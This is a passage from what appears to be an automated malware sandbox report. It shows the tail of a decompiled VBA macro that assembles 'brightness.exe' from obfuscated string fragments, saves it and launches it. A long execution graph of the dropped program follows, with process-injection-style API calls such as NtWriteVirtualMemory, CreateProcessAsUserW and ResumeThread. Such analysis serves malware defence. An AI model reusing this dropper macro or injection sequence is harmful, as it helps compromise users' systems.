                                                                                                                                          70

                                                                                                                                          Dim monu5

                                                                                                                                          71

                                                                                                                                          monu5 = "e"

                                                                                                                                          73

                                                                                                                                          Dim monu6

                                                                                                                                          74

                                                                                                                                          monu6 = monu1 & monu2 & monu3 & monu4 & monu5

                                                                                                                                          77

                                                                                                                                          . savetofile monu6, 2

                                                                                                                                          80

                                                                                                                                          Dim parveen1

                                                                                                                                          81

                                                                                                                                          Dim parveen2

                                                                                                                                          82

                                                                                                                                          Dim parveen3

                                                                                                                                          83

                                                                                                                                          Dim parveen4

                                                                                                                                          84

                                                                                                                                          Dim praveen1

                                                                                                                                          85

                                                                                                                                          praveen1 = """brightness"

                                                                                                                                          86

                                                                                                                                          Dim praveen2

                                                                                                                                          87

                                                                                                                                          praveen2 = "."

                                                                                                                                          89

                                                                                                                                          Dim praveen3

                                                                                                                                          90

                                                                                                                                          praveen3 = "e"

                                                                                                                                          92

                                                                                                                                          Dim praveen4

                                                                                                                                          93

                                                                                                                                          praveen4 = "x"

                                                                                                                                          95

                                                                                                                                          Dim praveen5

                                                                                                                                          96

                                                                                                                                          praveen5 = "e"""

                                                                                                                                          101

                                                                                                                                          Dim praveen6

                                                                                                                                          102

                                                                                                                                          praveen6 = praveen1 & praveen2 & praveen3 & praveen4 & praveen5

                                                                                                                                          106

                                                                                                                                          End With

                                                                                                                                          108

                                                                                                                                          Shell (praveen6)

                                                                                                                                          Shell(""brightness.exe"") -> 5560

                                                                                                                                          executed
                                                                                                                                          110

                                                                                                                                          End Sub

                                                                                                                                          Reset < >

                                                                                                                                            Execution Graph

                                                                                                                                            Execution Coverage:15.1%
                                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                                            Signature Coverage:30.4%
                                                                                                                                            Total number of Nodes:1623
                                                                                                                                            Total number of Limit Nodes:15
                                                                                                                                            execution_graph 25715 27dd2fc 25725 27b6518 25715->25725 25719 27dd32a 25730 27dbf84 timeSetEvent 25719->25730 25721 27dd334 25722 27dd342 GetMessageA 25721->25722 25723 27dd336 TranslateMessage DispatchMessageA 25722->25723 25724 27dd352 25722->25724 25723->25722 25726 27b6523 25725->25726 25731 27b4168 25726->25731 25729 27b427c SysAllocStringLen SysFreeString SysReAllocStringLen 25729->25719 25730->25721 25732 27b41ae 25731->25732 25733 27b43b8 25732->25733 25734 27b4227 25732->25734 25736 27b43e9 25733->25736 25740 27b43fa 25733->25740 25745 27b4100 25734->25745 25750 27b432c GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 25736->25750 25739 27b43f3 25739->25740 25741 27b443f FreeLibrary 25740->25741 25742 27b4463 25740->25742 25741->25740 25743 27b446c 25742->25743 25744 27b4472 ExitProcess 25742->25744 25743->25744 25746 27b4143 25745->25746 25747 27b4110 25745->25747 25746->25729 25747->25746 25751 27b15cc 25747->25751 25755 27b5814 25747->25755 25750->25739 25759 27b1560 25751->25759 25753 27b15d4 VirtualAlloc 25754 27b15eb 25753->25754 25754->25747 25756 27b5824 GetModuleFileNameA 25755->25756 25758 27b5840 25755->25758 25761 27b5a78 GetModuleFileNameA RegOpenKeyExA 25756->25761 25758->25747 25760 27b1500 25759->25760 25760->25753 25762 27b5afb 25761->25762 25763 27b5abb RegOpenKeyExA 25761->25763 25779 27b58b4 12 API calls 25762->25779 25763->25762 25764 27b5ad9 RegOpenKeyExA 25763->25764 25764->25762 25766 27b5b84 lstrcpynA GetThreadLocale GetLocaleInfoA 25764->25766 25769 27b5c9e 25766->25769 25773 27b5bbb 25766->25773 25767 27b5b20 RegQueryValueExA 25768 27b5b40 RegQueryValueExA 25767->25768 25770 27b5b5e RegCloseKey 25767->25770 25768->25770 25769->25758 25770->25758 25772 27b5bcb lstrlenA 25774 27b5be3 25772->25774 25773->25769 25773->25772 25774->25769 25775 27b5c08 lstrcpynA LoadLibraryExA 25774->25775 25776 27b5c30 25774->25776 25775->25776 25776->25769 25777 27b5c3a lstrcpynA LoadLibraryExA 25776->25777 25777->25769 25778 27b5c6c lstrcpynA LoadLibraryExA 25777->25778 25778->25769 25779->25767 25780 27b4c48 25781 27b4c6f 25780->25781 25782 27b4c4c 25780->25782 25783 27b4c0c 25782->25783 25784 27b4c5f SysReAllocStringLen 25782->25784 25785 27b4c12 SysFreeString 25783->25785 25786 27b4c20 25783->25786 25784->25781 25787 27b4bdc 25784->25787 25785->25786 25788 27b4bf8 25787->25788 25789 27b4be8 SysAllocStringLen 25787->25789 25789->25787 25789->25788 25790 27b4e88 25791 27b4e95 25790->25791 25795 27b4e9c 25790->25795 25799 27b4bdc SysAllocStringLen 25791->25799 25796 27b4bfc 25795->25796 25797 27b4c08 25796->25797 25798 27b4c02 SysFreeString 25796->25798 25798->25797 25799->25795 25800 27dbf78 25803 27cf0a8 25800->25803 25804 27cf0b0 25803->25804 25804->25804 28993 27c8704 LoadLibraryW 25804->28993 25806 27cf0d2 28998 27b2ee0 QueryPerformanceCounter 25806->28998 25808 27cf0d7 25809 27cf0e1 InetIsOffline 25808->25809 25810 27cf0fc 25809->25810 25811 27cf0eb 25809->25811 25812 27b4500 11 API calls 25810->25812 29010 27b4500 25811->29010 25814 27cf0fa 25812->25814 29001 27b480c 25814->29001 29016 27c80c0 28993->29016 28995 27c873d 29027 27c7cf8 28995->29027 28999 27b2ef8 GetTickCount 28998->28999 29000 27b2eed 28998->29000 28999->25808 29000->25808 29002 27b481d 29001->29002 29003 27b485a 29002->29003 29004 27b4843 29002->29004 29006 27b4570 11 API calls 29003->29006 29005 27b4b78 11 API calls 29004->29005 29008 27b4850 29005->29008 29006->29008 29007 27b488b 29008->29007 29009 27b4500 11 API calls 29008->29009 29009->29007 29011 27b4504 29010->29011 29014 27b4514 29010->29014 29013 27b4570 11 API calls 29011->29013 29011->29014 29012 27b4542 29012->25814 29013->29014 29014->29012 29015 27b2c2c 11 API calls 29014->29015 29015->29012 29017 27b4500 11 API calls 29016->29017 29018 27c80e5 29017->29018 29041 27c790c 29018->29041 29022 27c80ff 29023 27c8107 GetModuleHandleW GetProcAddress GetProcAddress 29022->29023 29024 27c813a 29023->29024 29062 27b44d0 29024->29062 29028 27b4500 11 API calls 29027->29028 29029 27c7d1d 29028->29029 29030 27c790c 12 API calls 29029->29030 29031 27c7d2a 29030->29031 29032 27b4798 11 API calls 29031->29032 29033 27c7d3a 29032->29033 29105 27c8018 29033->29105 29036 27c80c0 15 API calls 29037 27c7d53 NtWriteVirtualMemory 29036->29037 29038 27c7d7f 29037->29038 29039 27b44d0 11 API calls 29038->29039 29040 27c7d8c FreeLibrary 29039->29040 29040->25806 29042 27c791d 29041->29042 29066 27b4b78 29042->29066 29044 27c7999 29047 27b4798 29044->29047 29045 27c792d 29045->29044 29075 27bba3c CharNextA 29045->29075 29048 27b47fd 29047->29048 29049 27b479c 29047->29049 29050 27b4500 29049->29050 29051 27b47a4 29049->29051 29056 27b4570 11 API calls 29050->29056 29057 27b4514 29050->29057 29051->29048 29052 27b47b3 29051->29052 29054 27b4500 11 API calls 29051->29054 29055 27b4570 11 API calls 29052->29055 29053 27b4542 29053->29022 29054->29052 29059 27b47cd 29055->29059 29056->29057 29057->29053 29058 27b2c2c 11 API calls 29057->29058 29058->29053 29060 27b4500 11 API calls 29059->29060 29061 27b47f9 29060->29061 29061->29022 29064 27b44d6 29062->29064 29063 27b44fc 29063->28995 29064->29063 29065 27b2c2c 11 API calls 29064->29065 29065->29064 29067 27b4b85 29066->29067 29074 27b4bb5 29066->29074 29069 27b4bae 29067->29069 29071 27b4b91 29067->29071 29077 27b4570 29069->29077 29070 27b4b9f 29070->29045 29076 27b2c44 11 API calls 29071->29076 29082 27b44ac 29074->29082 29075->29045 29076->29070 29078 27b4598 29077->29078 29079 27b4574 29077->29079 29078->29074 29086 27b2c10 29079->29086 29081 27b4581 29081->29074 29083 27b44cd 29082->29083 29084 27b44b2 29082->29084 29083->29070 29084->29083 29096 27b2c2c 29084->29096 29087 27b2c27 29086->29087 29090 27b2c14 29086->29090 29087->29081 29088 27b2c1e 29088->29081 29089 27b2d19 29095 27b2ce8 7 API calls 29089->29095 29090->29088 29090->29089 29094 27b64cc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 29090->29094 29093 27b2d3a 29093->29081 29094->29089 29095->29093 29097 27b2c3a 29096->29097 29099 27b2c30 29096->29099 29097->29083 29098 27b2d19 29104 27b2ce8 7 API calls 29098->29104 29099->29097 29099->29098 29103 27b64cc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 29099->29103 29102 27b2d3a 29102->29083 29103->29098 29104->29102 29106 27b4500 11 API calls 29105->29106 29107 27c803b 29106->29107 29108 27c790c 12 API calls 29107->29108 29109 27c8048 29108->29109 29110 27c8050 GetModuleHandleA 29109->29110 29111 27c80c0 15 API calls 29110->29111 29112 27c8061 GetModuleHandleA 29111->29112 29113 27c807f 29112->29113 29114 27b44ac 11 API calls 29113->29114 29115 27c7d4d 29114->29115 29115->29036 29116 27d6bf8 29117 27b480c 11 API calls 29116->29117 29118 27d6c19 29117->29118 29119 27b4798 11 API calls 29118->29119 29120 27d6c50 29119->29120 29933 27c881c 29120->29933 29123 27b480c 11 API calls 29124 27d6c95 29123->29124 29125 27b4798 11 API calls 29124->29125 29126 27d6ccc 29125->29126 29127 27c881c 22 API calls 29126->29127 29128 27d6cf0 29127->29128 29129 27b480c 11 API calls 29128->29129 29130 27d6d11 29129->29130 29131 27b4798 11 API calls 29130->29131 29132 27d6d48 29131->29132 29133 27c881c 22 API calls 29132->29133 29134 27d6d6c 29133->29134 29135 27b480c 11 API calls 29134->29135 29136 27d6d8d 29135->29136 29137 27b4798 11 API calls 29136->29137 29138 27d6dc4 29137->29138 29139 27c881c 22 API calls 29138->29139 29140 27d6de8 29139->29140 29141 27b480c 11 API calls 29140->29141 29142 27d6e09 29141->29142 29143 27b4798 11 API calls 29142->29143 29144 27d6e40 29143->29144 29145 27c881c 22 API calls 29144->29145 29146 27d6e64 29145->29146 29147 27b480c 11 API calls 29146->29147 29148 27d6e9e 29147->29148 29946 27ce36c 29148->29946 29150 27d6ecd 29956 27ceaf4 29150->29956 29153 27b480c 11 API calls 29154 27d6f1d 29153->29154 29155 27b4798 11 API calls 29154->29155 29156 27d6f54 29155->29156 29157 27c881c 22 API calls 29156->29157 29158 27d6f78 29157->29158 29159 27b480c 11 API calls 29158->29159 29160 27d6f99 29159->29160 29161 27b4798 11 API calls 29160->29161 29162 27d6fd0 29161->29162 29163 27c881c 22 API calls 29162->29163 29164 27d6ff4 29163->29164 29165 27b480c 11 API calls 29164->29165 29166 27d7015 29165->29166 29167 27b4798 11 API calls 29166->29167 29168 27d704c 29167->29168 29169 27c881c 22 API calls 29168->29169 29170 27d7070 29169->29170 29171 27b480c 11 API calls 29170->29171 29172 27d7091 29171->29172 29173 27b4798 11 API calls 29172->29173 29174 27d70c8 29173->29174 29175 27d70ec 29174->29175 29176 27c881c 22 API calls 29174->29176 29177 27b480c 11 API calls 29175->29177 29176->29175 29178 27d710d 29177->29178 29179 27b4798 11 API calls 29178->29179 29180 27d7144 29179->29180 29181 27c881c 22 API calls 29180->29181 29182 27d7168 29181->29182 29183 27b480c 11 API calls 29182->29183 29184 27d7189 29183->29184 29185 27b4798 11 API calls 29184->29185 29186 27d71c0 29185->29186 29187 27c881c 22 API calls 29186->29187 29188 27d71e4 29187->29188 29189 27b480c 11 API calls 29188->29189 29190 27d7205 29189->29190 29191 27b4798 11 API calls 29190->29191 29192 27d723c 29191->29192 29193 27c881c 22 API calls 29192->29193 29194 27d7260 29193->29194 29195 27b480c 11 API calls 29194->29195 29196 27d7281 29195->29196 29197 27b4798 11 API calls 29196->29197 29198 27d72b8 29197->29198 29199 27c881c 22 API calls 29198->29199 29200 27d72dc 29199->29200 29201 27b480c 11 API calls 29200->29201 29202 27d72fd 29201->29202 29203 27b4798 11 API calls 29202->29203 29204 27d7334 29203->29204 29205 27c881c 22 API calls 29204->29205 29206 27d7358 29205->29206 29207 27d736d 29206->29207 29208 27d7e9c 29206->29208 29209 27b480c 11 API calls 29207->29209 29210 27b480c 11 API calls 29208->29210 29211 27d738e 29209->29211 29212 27d7ebd 29210->29212 29213 27b4798 11 API calls 29211->29213 29214 27b4798 11 API calls 29212->29214 29215 27d73c5 29213->29215 29216 27d7ef4 29214->29216 29217 27c881c 22 API calls 29215->29217 29218 27c881c 22 API calls 29216->29218 29219 27d73e9 29217->29219 29220 27d7f18 29218->29220 29221 27b480c 11 API calls 29219->29221 29222 27b480c 11 API calls 29220->29222 29223 27d740a 29221->29223 29224 27d7f39 29222->29224 29225 27b4798 11 API calls 29223->29225 29226 27b4798 11 API calls 29224->29226 29227 27d7441 29225->29227 29228 27d7f70 29226->29228 29229 27c881c 22 API calls 29227->29229 29230 27c881c 22 API calls 29228->29230 29231 27d7465 29229->29231 29232 27d7f94 29230->29232 29233 27b480c 11 API calls 29231->29233 29234 27b480c 11 API calls 29232->29234 29235 27d7486 29233->29235 29236 27d7fb5 29234->29236 29237 27b4798 11 API calls 29235->29237 29238 27b4798 11 API calls 29236->29238 29239 27d74bd 29237->29239 29240 27d7fec 29238->29240 29241 27c881c 22 API calls 29239->29241 29242 27c881c 22 API calls 29240->29242 29243 27d74e1 29241->29243 29244 27d8010 29242->29244 29245 27b4798 11 API calls 29243->29245 29246 27b480c 11 API calls 29244->29246 29247 27d74f9 29245->29247 29249 27d8031 29246->29249 30413 27c8408 29247->30413 29252 27b4798 11 API calls 29249->29252 29250 27d750a 29251 27b480c 11 API calls 29250->29251 29253 27d752b 29251->29253 29254 27d8068 29252->29254 29255 27b4798 11 API calls 29253->29255 29256 27c881c 22 API calls 29254->29256 29258 27d7562 29255->29258 29257 27d808c 29256->29257 29259 27d8f25 29257->29259 29260 27d80a1 29257->29260 29263 27c881c 22 API calls 29258->29263 29261 27b480c 11 API calls 29259->29261 29262 27b480c 11 API calls 29260->29262 29267 27d8f46 29261->29267 29264 27d80c2 29262->29264 29265 27d7586 29263->29265 29268 27d80da 29264->29268 29266 27b480c 11 API calls 29265->29266 29271 27d75a7 29266->29271 29269 27b4798 11 API calls 29267->29269 29270 27b4798 11 API calls 29268->29270 29275 27d8f7d 29269->29275 29272 27d80f9 29270->29272 29273 27b4798 11 API calls 29271->29273 29274 27d8111 29272->29274 29279 27d75de 29273->29279 29277 27c881c 22 API calls 29274->29277 29276 27c881c 22 API calls 29275->29276 29278 27d8fa1 29276->29278 29280 27d811d 29277->29280 29281 27b480c 11 API calls 29278->29281 29283 27c881c 22 API calls 29279->29283 29282 27b480c 11 API calls 29280->29282 29287 27d8fc2 29281->29287 29284 27d813e 29282->29284 29285 27d7602 29283->29285 29288 27d8149 29284->29288 29286 27b480c 11 API calls 29285->29286 29291 27d7623 29286->29291 29289 27b4798 11 API calls 29287->29289 29290 27b4798 11 API calls 29288->29290 29294 27d8ff9 29289->29294 29292 27d8175 29290->29292 29293 27b4798 11 API calls 29291->29293 29295 27d8180 29292->29295 29298 27d765a 29293->29298 29297 27c881c 22 API calls 29294->29297 29296 27c881c 22 API calls 29295->29296 29299 27d8199 29296->29299 29300 27d901d 29297->29300 29303 27c881c 22 API calls 29298->29303 29302 27b480c 11 API calls 29299->29302 29301 27b480c 11 API calls 29300->29301 29304 27d903e 29301->29304 29305 27d81ba 29302->29305 29306 27d767e 29303->29306 29307 27b4798 11 API calls 29304->29307 29308 27b4798 11 API calls 29305->29308 30425 27cac30 29 API calls 29306->30425 29312 27d9075 29307->29312 29313 27d81f1 29308->29313 29310 27d76a5 29311 27b480c 11 API calls 29310->29311 29316 27d76c6 29311->29316 29315 27c881c 22 API calls 29312->29315 29314 27c881c 22 API calls 29313->29314 29317 27d8215 29314->29317 29324 27d9099 29315->29324 29319 27b4798 11 API calls 29316->29319 29318 27b4798 11 API calls 29317->29318 29320 27d8241 29318->29320 29325 27d76fd 29319->29325 29323 27d8259 29320->29323 29321 27d9854 29322 27b480c 11 API calls 29321->29322 29327 27d9875 29322->29327 29329 27d8264 CreateProcessAsUserW 29323->29329 29324->29321 29326 27b480c 11 API calls 29324->29326 29328 27c881c 22 API calls 29325->29328 29337 27d90e4 29326->29337 29333 27b4798 11 API calls 29327->29333 29330 27d7721 29328->29330 29331 27d8276 29329->29331 29332 27d82f2 29329->29332 29335 27b480c 11 API calls 29330->29335 29336 27b480c 11 API calls 29331->29336 29334 27b480c 11 API calls 29332->29334 29341 27d98ac 29333->29341 29342 27d8313 29334->29342 29343 27d7742 29335->29343 29338 27d8297 29336->29338 29339 27b4798 11 API calls 29337->29339 29340 27d82a2 29338->29340 29350 27d911b 29339->29350 29345 27b4798 11 API calls 29340->29345 29346 27c881c 22 API calls 29341->29346 29347 27b4798 11 API calls 29342->29347 29344 27b4798 11 API calls 29343->29344 29356 27d7779 29344->29356 29348 27d82ce 29345->29348 29349 27d98d0 29346->29349 29355 27d834a 29347->29355 29353 27d82d9 29348->29353 29351 27b480c 11 API calls 29349->29351 29352 27c881c 22 API calls 29350->29352 29358 27d98f1 29351->29358 29354 27d913f 29352->29354 29362 27c881c 22 API calls 29353->29362 29357 27b480c 11 API calls 29354->29357 29360 27c881c 22 API calls 29355->29360 29361 27c881c 22 API calls 29356->29361 29359 27d9160 29357->29359 29365 27b4798 11 API calls 29358->29365 29368 27b4798 11 API calls 29359->29368 29363 27d836e 29360->29363 29364 27d779d 29361->29364 29362->29332 29366 27b480c 11 API calls 29363->29366 29367 27b480c 11 API calls 29364->29367 29370 27d9928 29365->29370 29371 27d838f 29366->29371 29369 27d77be 29367->29369 29376 27d9197 29368->29376 29374 27b4798 11 API calls 29369->29374 29372 27c881c 22 API calls 29370->29372 29373 27b4798 11 API calls 29371->29373 29375 27d994c 29372->29375 29379 27d83c6 29373->29379 29380 27d77f5 29374->29380 29377 27b480c 11 API calls 29375->29377 29378 27c881c 22 API calls 29376->29378 29385 27d996d 29377->29385 29381 27d91bb 29378->29381 29383 27c881c 22 API calls 29379->29383 29384 27c881c 22 API calls 29380->29384 29382 27b480c 11 API calls 29381->29382 29389 27d91dc 29382->29389 29386 27d83ea 29383->29386 29387 27d7819 29384->29387 29388 27b4798 11 API calls 29385->29388 29390 27b49a4 11 API calls 29386->29390 29392 27b480c 11 API calls 29387->29392 29394 27d99a4 29388->29394 29393 27b4798 11 API calls 29389->29393 29391 27d840e 29390->29391 29395 27b480c 11 API calls 29391->29395 29398 27d7859 29392->29398 29399 27d9213 29393->29399 29396 27c881c 22 API calls 29394->29396 29397 27d843d 29395->29397 29403 27d99c8 29396->29403 29402 27d8448 29397->29402 29400 27b4798 11 API calls 29398->29400 29401 27c881c 22 API calls 29399->29401 29408 27d7890 29400->29408 29404 27d9237 29401->29404 29405 27b4798 11 API calls 29402->29405 29409 27c881c 22 API calls 29403->29409 29968 27ce974 29404->29968 29407 27d8474 29405->29407 29415 27d847f 29407->29415 29412 27c881c 22 API calls 29408->29412 29414 27d99fb 29409->29414 29411 27b480c 11 API calls 29417 27d927b 29411->29417 29413 27d78b4 29412->29413 29416 27b480c 11 API calls 29413->29416 29419 27c881c 22 API calls 29414->29419 29418 27c881c 22 API calls 29415->29418 29423 27d78d5 29416->29423 29421 27b480c 11 API calls 29417->29421 29420 27d8498 29418->29420 29424 27d9a2e 29419->29424 29422 27b480c 11 API calls 29420->29422 29426 27d92b3 29421->29426 29427 27d84b9 29422->29427 29425 27b4798 11 API calls 29423->29425 29428 27c881c 22 API calls 29424->29428 29431 27d790c 29425->29431 29429 27b4798 11 API calls 29426->29429 29430 27b4798 11 API calls 29427->29430 29433 27d9a61 29428->29433 29434 27d92ea 29429->29434 29435 27d84f0 29430->29435 29432 27c881c 22 API calls 29431->29432 29436 27d7930 29432->29436 29438 27c881c 22 API calls 29433->29438 29440 27c881c 22 API calls 29434->29440 29441 27c881c 22 API calls 29435->29441 29437 27b480c 11 API calls 29436->29437 29447 27d7951 29437->29447 29439 27d9a94 29438->29439 29442 27b480c 11 API calls 29439->29442 29443 27d930e 29440->29443 29444 27d8514 29441->29444 29448 27d9ab5 29442->29448 29445 27b480c 11 API calls 29443->29445 29446 27b480c 11 API calls 29444->29446 29450 27d932f 29445->29450 29451 27d8535 29446->29451 29449 27b4798 11 API calls 29447->29449 29452 27b4798 11 API calls 29448->29452 29455 27d7988 29449->29455 29453 27b4798 11 API calls 29450->29453 29454 27b4798 11 API calls 29451->29454 29457 27d9aec 29452->29457 29460 27d9366 29453->29460 29458 27d856c 29454->29458 29456 27c881c 22 API calls 29455->29456 29459 27d79ac 29456->29459 29462 27c881c 22 API calls 29457->29462 29464 27c881c 22 API calls 29458->29464 30426 27c5a6c 42 API calls 29459->30426 29463 27c881c 22 API calls 29460->29463 29466 27d9b10 29462->29466 29467 27d938a 29463->29467 29468 27d8590 29464->29468 29470 27b480c 11 API calls 29466->29470 29975 27b7e10 29467->29975 30429 27ccf9c 25 API calls 29468->30429 29469 27d79d8 29477 27b4b78 11 API calls 29469->29477 29478 27d9b31 29470->29478 29474 27d85a4 29476 27b480c 11 API calls 29474->29476 29475 27d964e 29479 27b480c 11 API calls 29475->29479 29484 27d85ca 29476->29484 29481 27d79ed 29477->29481 29483 27b4798 11 API calls 29478->29483 29485 27d966f 29479->29485 29480 27b480c 11 API calls 29486 27d93bd 29480->29486 29482 27b480c 11 API calls 29481->29482 29488 27d7a0e 29482->29488 29489 27d9b68 29483->29489 29487 27b4798 11 API calls 29484->29487 29490 27b4798 11 API calls 29485->29490 29491 27b4798 11 API calls 29486->29491 29494 27d8601 29487->29494 29492 27b4798 11 API calls 29488->29492 29493 27c881c 22 API calls 29489->29493 29497 27d96a6 29490->29497 29498 27d93f4 29491->29498 29500 27d7a45 29492->29500 29495 27d9b8c 29493->29495 29499 27c881c 22 API calls 29494->29499 29496 27b480c 11 API calls 29495->29496 29508 27d9bad 29496->29508 29503 27c881c 22 API calls 29497->29503 29501 27c881c 22 API calls 29498->29501 29502 27d8625 29499->29502 29507 27c881c 22 API calls 29500->29507 29505 27d9418 29501->29505 29506 27b480c 11 API calls 29502->29506 29504 27d96ca 29503->29504 29509 27b480c 11 API calls 29504->29509 29510 27b480c 11 API calls 29505->29510 29513 27d8646 29506->29513 29511 27d7a69 29507->29511 29512 27b4798 11 API calls 29508->29512 29515 27d96eb 29509->29515 29516 27d9439 29510->29516 29514 27b49a4 11 API calls 29511->29514 29520 27d9be4 29512->29520 29518 27b4798 11 API calls 29513->29518 29517 27d7a86 29514->29517 29521 27b4798 11 API calls 29515->29521 29522 27b4798 11 API calls 29516->29522 30427 27c7dd0 17 API calls 29517->30427 29526 27d867d 29518->29526 29525 27c881c 22 API calls 29520->29525 29527 27d9722 29521->29527 29528 27d9470 29522->29528 29523 27d7a8c 29524 27b480c 11 API calls 29523->29524 29530 27d7aad 29524->29530 29532 27d9c08 29525->29532 29529 27c881c 22 API calls 29526->29529 29533 27c881c 22 API calls 29527->29533 29534 27c881c 22 API calls 29528->29534 29531 27d86a1 29529->29531 29537 27b4798 11 API calls 29530->29537 29536 27b480c 11 API calls 29531->29536 29540 27c881c 22 API calls 29532->29540 29538 27d9746 29533->29538 29535 27d9494 29534->29535 29539 27b480c 11 API calls 29535->29539 29542 27d86c2 29536->29542 29543 27d7ae4 29537->29543 29541 27b480c 11 API calls 29538->29541 29546 27d94b5 29539->29546 29544 27d9c3b 29540->29544 29545 27d9767 29541->29545 29547 27b4798 11 API calls 29542->29547 29548 27c881c 22 API calls 29543->29548 29549 27c881c 22 API calls 29544->29549 29550 27b4798 11 API calls 29545->29550 29551 27b4798 11 API calls 29546->29551 29554 27d86f9 29547->29554 29552 27d7b08 29548->29552 29555 27d9c6e 29549->29555 29556 27d979e 29550->29556 29557 27d94ec 29551->29557 29553 27b480c 11 API calls 29552->29553 29558 27d7b29 29553->29558 29559 27c881c 22 API calls 29554->29559 29561 27c881c 22 API calls 29555->29561 29562 27c881c 22 API calls 29556->29562 29563 27c881c 22 API calls 29557->29563 29566 27b4798 11 API calls 29558->29566 29560 27d871d 29559->29560 29564 27d873d 29560->29564 29565 27d8726 29560->29565 29573 27d9ca1 29561->29573 29567 27d97c2 29562->29567 29568 27d9510 29563->29568 29570 27b480c 11 API calls 29564->29570 30430 27c857c 17 API calls 29565->30430 29574 27d7b60 29566->29574 29571 27b480c 11 API calls 29567->29571 29572 27b480c 11 API calls 29568->29572 29578 27d875e 29570->29578 29576 27d97e3 29571->29576 29577 27d9531 29572->29577 29575 27c881c 22 API calls 29573->29575 29579 27c881c 22 API calls 29574->29579 29585 27d9cd4 29575->29585 29580 27b4798 11 API calls 29576->29580 29581 27b4798 11 API calls 29577->29581 29582 27b4798 11 API calls 29578->29582 29583 27d7b84 29579->29583 29587 27d981a 29580->29587 29588 27d9568 29581->29588 29589 27d8795 29582->29589 29584 27b480c 11 API calls 29583->29584 29591 27d7ba5 29584->29591 29586 27c881c 22 API calls 29585->29586 29590 27d9d07 29586->29590 29594 27c881c 22 API calls 29587->29594 29595 27c881c 22 API calls 29588->29595 29592 27c881c 22 API calls 29589->29592 29593 27b480c 11 API calls 29590->29593 29597 27b4798 11 API calls 29591->29597 29596 27d87b9 29592->29596 29604 27d9d28 29593->29604 29598 27d983e 29594->29598 29599 27d958c 29595->29599 29600 27b480c 11 API calls 29596->29600 29606 27d7bdc 29597->29606 29994 27b49a4 29598->29994 29602 27b480c 11 API calls 29599->29602 29608 27d87da 29600->29608 29607 27d95ad 29602->29607 29609 27b4798 11 API calls 29604->29609 29610 27c881c 22 API calls 29606->29610 29611 27b4798 11 API calls 29607->29611 29612 27b4798 11 API calls 29608->29612 29615 27d9d5f 29609->29615 29613 27d7c00 29610->29613 29617 27d95e4 29611->29617 29618 27d8811 29612->29618 29614 27b480c 11 API calls 29613->29614 29620 27d7c21 29614->29620 29616 27c881c 22 API calls 29615->29616 29619 27d9d83 29616->29619 29622 27c881c 22 API calls 29617->29622 29623 27c881c 22 API calls 29618->29623 29621 27b480c 11 API calls 29619->29621 29625 27b4798 11 API calls 29620->29625 29627 27d9da4 29621->29627 29631 27d9608 29622->29631 29624 27d8835 29623->29624 29626 27b480c 11 API calls 29624->29626 29628 27d7c58 29625->29628 29629 27d8856 29626->29629 29630 27b4798 11 API calls 29627->29630 29632 27c881c 22 API calls 29628->29632 29634 27b4798 11 API calls 29629->29634 29637 27d9ddb 29630->29637 29979 27cdf00 29631->29979 29635 27d7c7c 29632->29635 29639 27d888d 29634->29639 30428 27caf50 41 API calls 29635->30428 29638 27c881c 22 API calls 29637->29638 29643 27d9dff 29638->29643 29641 27c881c 22 API calls 29639->29641 29640 27d7c8d 29642 27d88b1 ResumeThread 29641->29642 29644 27b480c 11 API calls 29642->29644 29645 27c881c 22 API calls 29643->29645 29647 27d88dd 29644->29647 29646 27d9e32 29645->29646 29648 27b480c 11 API calls 29646->29648 29649 27b4798 11 API calls 29647->29649 29650 27d9e53 29648->29650 29652 27d8914 29649->29652 29651 27b4798 11 API calls 29650->29651 29655 27d9e8a 29651->29655 29653 27c881c 22 API calls 29652->29653 29654 27d8938 29653->29654 29656 27b480c 11 API calls 29654->29656 29657 27c881c 22 API calls 29655->29657 29659 27d8959 29656->29659 29658 27d9eae 29657->29658 29660 27b480c 11 API calls 29658->29660 29661 27b4798 11 API calls 29659->29661 29662 27d9ecf 29660->29662 29663 27d8990 29661->29663 29664 27b4798 11 API calls 29662->29664 29665 27c881c 22 API calls 29663->29665 29667 27d9f06 29664->29667 29666 27d89b4 29665->29666 29668 27b480c 11 API calls 29666->29668 29669 27c881c 22 API calls 29667->29669 29672 27d89d5 29668->29672 29670 27d9f2a 29669->29670 29671 27b480c 11 API calls 29670->29671 29674 27d9f4b 29671->29674 29673 27b4798 11 API calls 29672->29673 29675 27d8a0c 29673->29675 29676 27b4798 11 API calls 29674->29676 29677 27c881c 22 API calls 29675->29677 29679 27d9f82 29676->29679 29678 27d8a30 CloseHandle 29677->29678 29680 27b480c 11 API calls 29678->29680 29681 27c881c 22 API calls 29679->29681 29682 27d8a5c 29680->29682 29683 27d9fa6 29681->29683 29684 27b4798 11 API calls 29682->29684 29685 27c881c 22 API calls 29683->29685 29686 27d8a93 29684->29686 29688 27d9fd9 29685->29688 29687 27c881c 22 API calls 29686->29687 29689 27d8ab7 29687->29689 29691 27c881c 22 API calls 29688->29691 29690 27b480c 11 API calls 29689->29690 29693 27d8ad8 29690->29693 29692 27da00c 29691->29692 29694 27c881c 22 API calls 29692->29694 29695 27b4798 11 API calls 29693->29695 29697 27da03f 29694->29697 29696 27d8b0f 29695->29696 29698 27c881c 22 API calls 29696->29698 29699 27c881c 22 API calls 29697->29699 29700 27d8b33 29698->29700 29701 27da072 29699->29701 29702 27b480c 11 API calls 29700->29702 29703 27b480c 11 API calls 29701->29703 29705 27d8b54 29702->29705 29704 27da093 29703->29704 29706 27b4798 11 API calls 29704->29706 29707 27b4798 11 API calls 29705->29707 29708 27da0ca 29706->29708 29709 27d8b8b 29707->29709 29711 27c881c 22 API calls 29708->29711 29710 27c881c 22 API calls 29709->29710 29712 27d8baf 29710->29712 29713 27da0ee 29711->29713 29714 27b480c 11 API calls 29712->29714 29715 27b480c 11 API calls 29713->29715 29716 27d8bd0 29714->29716 29717 27da10f 29715->29717 29719 27b4798 11 API calls 29716->29719 29718 27b4798 11 API calls 29717->29718 29720 27da146 29718->29720 29721 27d8c07 29719->29721 29722 27c881c 22 API calls 29720->29722 29723 27c881c 22 API calls 29721->29723 29726 27da16a 29722->29726 29724 27d8c2b 29723->29724 29725 27b480c 11 API calls 29724->29725 29727 27d8c4c 29725->29727 29728 27c881c 22 API calls 29726->29728 29729 27b4798 11 API calls 29727->29729 29730 27da19d 29728->29730 29732 27d8c83 29729->29732 29731 27c881c 22 API calls 29730->29731 29735 27da1d0 29731->29735 